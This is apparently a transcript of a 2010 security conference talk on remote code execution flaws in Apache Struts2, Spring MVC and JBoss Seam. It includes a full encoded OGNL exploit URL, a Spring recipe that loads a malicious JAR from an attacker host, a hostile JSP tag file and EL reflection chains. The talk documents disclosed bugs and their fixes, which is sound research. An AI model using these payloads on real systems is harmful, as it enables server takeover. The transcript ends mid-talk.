milking a horse or executing remote code in modern java ... · executing remote code in modern java...
TRANSCRIPT
![Page 1: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/1.jpg)
Milking a horse or
executing remote code in modern Java frameworks
Meder Kydyralievblog.o0o.nu
![Page 2: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/2.jpg)
...if you thought that neither was possible, you were wrong
![Page 3: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/3.jpg)
kumys is a fermented dairy product traditionally made from mare’s milk by nomads of Central asia
![Page 4: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/4.jpg)
http://en.wikipedia.org/wiki/File:Mare_milking_Suusamyr.jpg CC-BY-SA
![Page 5: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/5.jpg)
...back to security
![Page 6: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/6.jpg)
Evolution of web frameworks
![Page 7: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/7.jpg)
Plain old servlet
public class MyServlet extends HttpServlet { public void doGet (HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { PrintWriter out = res.getWriter(); String name = req.getParameter("name"); out.println("Hello, " + name + ". How are you?"); out.close(); }}
![Page 8: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/8.jpg)
Separation of controller and view
public void doGet (HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { int userId = Integer.parseInt(req.getParameter("uid")); User user = lookupUser(userId); req.setAttribute("user", user);}
hello.jsp:
...<% user = request.getAttribute("user"); %>Hello, <%= user.getName() %>. How are you?
![Page 9: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/9.jpg)
Problems
a lot of verbose boilerplate code
type conversion (including lists, arrays, etc)
input validation
object creation (calling setters/getters manually)
early frameworks/libraries asked to extend classes and implement interfaces
lots of XML configuration files
![Page 10: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/10.jpg)
Hey, let us take care of the boilerplate code. You write POJOs, we
do the rest.
![Page 11: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/11.jpg)
user
cod
e co
mpl
exity
framework code complexity
![Page 12: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/12.jpg)
JSP
JMXJSF
BeansAOP
EJB
JMS
JCA
ORM
OXMJSTL
Facelets
Pagelets
GroovyJAX
Richfaces
Guice
Hibernate
DWR
OSGi
Seam
XworkStruts
WebWork
![Page 13: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/13.jpg)
How secure are these Java frameworks?
![Page 14: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/14.jpg)
Previous vulnerabilities
Struts/Xwork
bunch of XSS bugs
directory traversal (CVE-2008-6505)
command execution through input validation (CVE-2007-4556)
Spring framework
remote regexp DoS (CVE-2009-1190)
![Page 15: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/15.jpg)
Approach
Use IDE (e.g. IntelliJ IDEA) for easier navigation
Dependency injection
Debugging: breakpoints, stepping, etc
Use sample apps provided with framework
Ensures better coverage
Took about 5 man-days to find and exploit each bug
![Page 16: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/16.jpg)
Look at how framework implements its magic
![Page 17: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/17.jpg)
Look at how framework implements its magic
![Page 18: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/18.jpg)
Apache Struts2
![Page 19: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/19.jpg)
Nifty features
Rich taglibrary (e.g. AJAXy tags):
OGNL:
Tags:
HTTP parameters:
<s:property value=" " />
<s:div id="div" />
<sx:a targets="div" value="Make Request" href=" " />%{#url}
#session.user.username
user.address.city = Bishkek
![Page 20: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/20.jpg)
Nifty features#session.user.usernameuser.address.city = Bishkek
![Page 21: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/21.jpg)
Nifty features#session.user.usernameuser.address.city = Bishkek
action.getUser().getAddress().setCity(“Bishkek”)
ActionContext.getContext().getSession().get(“username”)
![Page 22: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/22.jpg)
OGNL(Object Graph Navigation Language)
ANTLR-based parser
Features:
Properties setting/getting: foo.bar=baz becomes action.getFoo().setBar(“baz”)
Method calling: foo() and @java.lang.System@exit(1)
Constructor calling: new MyClass()
Ability to save arbitrary objects in OGNL context: #foo = new MyClass()
![Page 23: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/23.jpg)
HTTP parameters == OGNL statements
What prevents attacker from doing the following?
http://victim/[email protected]@exit(1)=meh
![Page 24: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/24.jpg)
HTTP parameters == OGNL statements
What prevents attacker from doing the following?
http://victim/[email protected]@exit(1)=meh
Method execution is guarded by:
OgnlContext‘s property xwork.MethodAccessor.denyMethodExecution
SecurityMemberAccess private field allowStaticMethodAccess
![Page 25: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/25.jpg)
CVE-2010-1870Based on my previous bug: XW-641
# denotes references to variables in OGNL
Special OGNL variables:
#application
#session
#root
#request
#parameters
#attr
ParametersInterceptor blacklists # to prevent tampering with server-side data
![Page 26: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/26.jpg)
XW-641
('\u0023' + 'session[\'user\']')(unused)=0wn3d
![Page 27: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/27.jpg)
XW-641
('\u0023' + 'session[\'user\']')(unused)=0wn3d
![Page 28: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/28.jpg)
XW-641
('\u0023' + 'session[\'user\']')(unused)=0wn3d
#session['user']=0wn3d
![Page 29: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/29.jpg)
XW-641
('\u0023' + 'session[\'user\']')(unused)=0wn3d
ActionContext.getContext().getSession().put(“user”, “0wn3d”)
#session['user']=0wn3d
![Page 30: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/30.jpg)
XW-641 fix was to clear the value stack
![Page 31: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/31.jpg)
CVE-2010-1870There are actually more special variables available:
#root
#this
#_typeResolver
#_classResolver
#_traceEvaluations
#_lastEvaluation
#_keepLastEvaluation
#_memberAccess
#context
![Page 32: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/32.jpg)
CVE-2010-1870
#_memberAccess
#context - OgnlContext, the one guarding method execution using xwork.MethodAccessor.denyMethodExecution property
- SecurityMemberAccess guarding method execution with allowStaticAccess private field
![Page 33: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/33.jpg)
CVE-2010-1870
#_memberAccess
#context
[‘allowStatcMemberAccess’] = true
[‘xwork.MethodAccessor.denyMethodExecution’] = false
![Page 34: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/34.jpg)
CVE-2010-1870 exploit
![Page 35: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/35.jpg)
CVE-2010-1870 exploit
#_memberAccess[‘allowStaticMethodAccess’] = true
![Page 36: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/36.jpg)
CVE-2010-1870 exploit
#_memberAccess[‘allowStaticMethodAccess’] = true
#foo = new java.lang.Boolean(“false”)
![Page 37: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/37.jpg)
CVE-2010-1870 exploit
#_memberAccess[‘allowStaticMethodAccess’] = true
#context[‘xwork.MethodAccessor.denyMethodExecution’] = #foo
#foo = new java.lang.Boolean(“false”)
![Page 38: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/38.jpg)
CVE-2010-1870 exploit
#_memberAccess[‘allowStaticMethodAccess’] = true
#context[‘xwork.MethodAccessor.denyMethodExecution’] = #foo
#rt = @java.lang.Runtime@getRuntime()
#foo = new java.lang.Boolean(“false”)
![Page 39: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/39.jpg)
CVE-2010-1870 exploit
#_memberAccess[‘allowStaticMethodAccess’] = true
#context[‘xwork.MethodAccessor.denyMethodExecution’] = #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec(“touch /tmp/KUMYS”, null)
#foo = new java.lang.Boolean(“false”)
![Page 40: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/40.jpg)
CVE-2010-1870 exploit
/HelloWorld.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(ssss)((\u0023rt\[email protected]@getRuntime())(\u0023rt.exec('mkdir\u0020/tmp/PWNED'\u002cnull)))=1
![Page 41: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/41.jpg)
CVE-2010-1870 fix
2.2.1 fixes vulnerability (~3 months)
Work around is either:
whitelist A-z0-9_[].’
use “params” interceptor’s excludeParams parameter to blacklist:
\u ( )
![Page 42: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/42.jpg)
Spring MVC
![Page 43: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/43.jpg)
Spring
Spring MVC is Spring’s web framework
uses Java Beans API (java.beans.*)
A lot of components (AOP, etc)
![Page 44: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/44.jpg)
java.beans.Introspector
BeanInfo getBeanInfo(Class beanClass);
BeanInfo getBeanInfo(Class beanClass, Class stopClass);
Following API return bean information about specified class (properties, setter/getter methods, etc):
![Page 45: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/45.jpg)
class Person {private String ;private String ;
public String getFirstName();public String getLastName();
public void setFirstName(String);public void setLastName(String);
}
firstNamelastName
HTTP parameters: firstName=Tavis&lastName=Ormandy
BeanInfo getBeanInfo(Class beanClass);
![Page 46: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/46.jpg)
Introspector.getBeanInfo(Person);
firstName
lastName
![Page 47: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/47.jpg)
Introspector.getBeanInfo(Person);
firstName
lastNameclass
![Page 48: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/48.jpg)
Introspector.getBeanInfo(Person);
firstName
lastNameclass
Object.class
Person.class
![Page 49: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/49.jpg)
firstName
lastName
class classLoader
jarPath
antiJARLocking
workDir
URLs
[0] = file:///www/WEB-INF/lib
[1] = file:///www/tomcat/lib
Introspector.getBeanInfo(Person);
![Page 50: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/50.jpg)
Incorrect usage of Beans API exposes org.apache.catalina.loader.WebAppClassloader’s URL paths:
Overridden path isn’t used to resolve classes
But Jasper (Apache’s JSP engine) uses overriden paths to resolve JSP tag libraries (TLD)
CVE-2010-1622
class.classLoader.URLs[0]=file:///tmp/
![Page 51: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/51.jpg)
Two problems:
How do we execute code using TLD file?
How do we suppy attacker controlled TLD remotely?
CVE-2010-1622
![Page 52: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/52.jpg)
TLD file defines which classes handle custom tags:
Instead of classes it’s possible to specify tag files:
Executing code via TLD
<form:form method=”post” commandName=”/meh”></form:form>
<tag-file> <name>input</name> <path>/META-INF/tags/InputTag.tag</path> </tag-file>
![Page 53: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/53.jpg)
InputTag.tag
<%@ tag dynamic-attributes="dynattrs" %><%
Runtime r = java.lang.Runtime.getRuntime(); r.exec("mkdir /tmp/PWNED"); %>
![Page 54: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/54.jpg)
Jasper uses java.net.URL to scan JARs
java.net.URL automatically handles remote JAR URLs:
Tag files are retrieved from the same JAR!!!
How do we supply TLD and tag files remotely?
jar:http://attacker/spring-form.jar!/
![Page 55: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/55.jpg)
CVE-2010-1622 exploitDownload org.springframework.web.servlet-X.X.X.RELEASE.jar
Edit spring-form.tld and add tag file definitions for all tags. Example for <form:input> tag:
Create corresponding tag files, e.g. InputTag.tag:
Bundle everything back into spring-form.jar and put it up online
Submit POST request to a form controller with the following parameter:
class.classLoader.URLs[0]=jar:http://attacker/spring-form.jar!/
<tag-file> <name>input</name> <path>/META-INF/tags/InputTag.tag</path> </tag-file>
<%@ attribute name="path" required="true" %><%@ attribute name="id" required="false" %><% java.lang.Runtime.getRuntime().exec("mkdir /tmp/PWNED");%>
![Page 56: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/56.jpg)
CVE-2010-1622 fix
Proper fix is to use Introspector API correctly and specify the stop class:
Other projects may be vulnerable to this bug too.
Spring disallows access to class.classLoader
Fixed in the following versions:
Spring Framework 3.0.3/2.5.6.SEC02/2.5.7.SR01
Introspector.getBeanInfo(Person.class, Object.class);
![Page 57: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/57.jpg)
JBoss Seam
![Page 58: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/58.jpg)
Java Reflection 101
1: String strInstance = "HITB KUL 2010";
2: Class clz = Class.forName("java.lang.String");
3: Method lenMethod = clz.getDeclaredMethod("length", new Class[] {});
4: int strlen = (Integer) lenMethod.invoke(strInstance, new Object[] {});
![Page 59: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/59.jpg)
JBoss Seam
Combines EJB3 with JSF
POJOs + annotations
JBoss Unified Expression Language
![Page 60: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/60.jpg)
JBoss ELFormat: #{expression}
Supports method calling: #{object.method()}
Various predefined variables: request, session, etc.
Container indexing support: #{foo()[123]}
Projection (iteration): #{company.departments.{d|d.name}}
![Page 61: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/61.jpg)
CVE-2010-1871
Special HTTP parameter controlled where browser should be redirected after an action (actionOutcome)
If supplied URL started with / and contained HTTP parameters all JBoss EL expressions in parameter values are executed:
#{expr}
![Page 62: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/62.jpg)
CVE-2010-1871
Special HTTP parameter controlled where browser should be redirected after an action (actionOutcome)
If supplied URL started with / and contained HTTP parameters all JBoss EL expressions in parameter values are executed:
%23{expr}
![Page 63: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/63.jpg)
CVE-2010-1871
Special HTTP parameter controlled where browser should be redirected after an action (actionOutcome)
If supplied URL started with / and contained HTTP parameters all JBoss EL expressions in parameter values are executed:
pwned%3d%23{expr}
![Page 64: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/64.jpg)
CVE-2010-1871
Special HTTP parameter controlled where browser should be redirected after an action (actionOutcome)
If supplied URL started with / and contained HTTP parameters all JBoss EL expressions in parameter values are executed:
/seam?actionOutcome=/p.xhtml%3fpwned%3d%23{expr}
![Page 65: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/65.jpg)
CVE-2010-1871 exploitHow to execute OS commands via JBoss EL?
can’t reference java.lang.Runtime directly, since resolvers won’t know how to resolve ‘java’
Reflection!!!
Every Object has Class getClass()
And Class has Class forName(String), which returns class based on supplied name:view.getClass.forName('java.lang.Runtime')
![Page 66: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/66.jpg)
CVE-2010-1871 exploit
view.getClass.forName('java.lang.Runtime')
![Page 67: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/67.jpg)
CVE-2010-1871 exploit
view.getClass.forName('java.lang.Runtime')
.getDeclaredMethods()
![Page 68: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/68.jpg)
CVE-2010-1871 exploit
view.getClass.forName('java.lang.Runtime')
.getDeclaredMethods()java.lang.reflect.Method[]
![Page 69: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/69.jpg)
CVE-2010-1871 exploit
view.getClass.forName('java.lang.Runtime')
.getDeclaredMethods()java.lang.reflect.Method[] [19]
![Page 70: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/70.jpg)
CVE-2010-1871 exploit
view.getClass.forName('java.lang.Runtime')
.getDeclaredMethods()java.lang.reflect.Method[] [19]
.invoke()
![Page 71: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/71.jpg)
CVE-2010-1871 exploit
To call java.lang.Runtime.exec() we need to:
obtain java.lang.Runtime reference via static reflection call to Runtime.getRuntime(), by finding its index in the array returned by Class.getDeclaredMethods()
pass the above reference to Runtime.exec() reflection call, which we also invoke by its index
![Page 72: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/72.jpg)
How do we get method’s index?
